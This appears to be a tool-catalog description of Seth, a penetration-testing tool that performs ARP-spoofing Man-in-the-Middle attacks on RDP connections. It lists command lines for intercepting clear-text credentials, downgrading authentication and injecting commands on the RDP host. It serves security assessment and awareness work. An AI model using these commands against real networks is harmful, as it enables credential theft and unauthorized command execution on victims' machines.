Seth is a Python and Bash tool that performs Man-in-the-Middle attacks on RDP connections to extract clear text credentials by downgrading authentication.
Perform a MitM attack and extract clear text credentials from RDP connections
This tool is primarily used by penetration testers and red teamers to demonstrate the risks of improperly configured RDP connections by intercepting and extracting credentials during active sessions. It is useful in security assessments, workshops, and educational talks to raise awareness about RDP security weaknesses.
The tool relies on the victim not enforcing Network Level Authentication (NLA) and ignoring certificate warnings. Keystroke injection is currently reliable only with the English US keyboard layout. Using powershell encoded commands is recommended to avoid special character issues. Proper network setup is required, including IP forwarding and ARP spoofing capabilities.
Clone the repository from GitHub
Ensure Python and Bash are installed on your system
Make the seth.sh script executable (chmod +x seth.sh)
Prepare certificate and key files for the RDP proxy
Run the tool with appropriate network interface and IP parameters./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]
Starts the ARP spoofing attack and RDP proxy to intercept credentials; optionally injects a command on the RDP host.
seth.py -h
Displays help and usage information for the Python proxy script.
seth.py -d -f -p 3389 -b 0.0.0.0 -g 3 -j calc -c cert.pem -k key.pem target_host
Runs the RDP proxy with debug mode, fake server attack, listening on port 3389, binding to all IPs, downgrading auth to level 3, injecting 'calc' command, and using specified certificate and key files.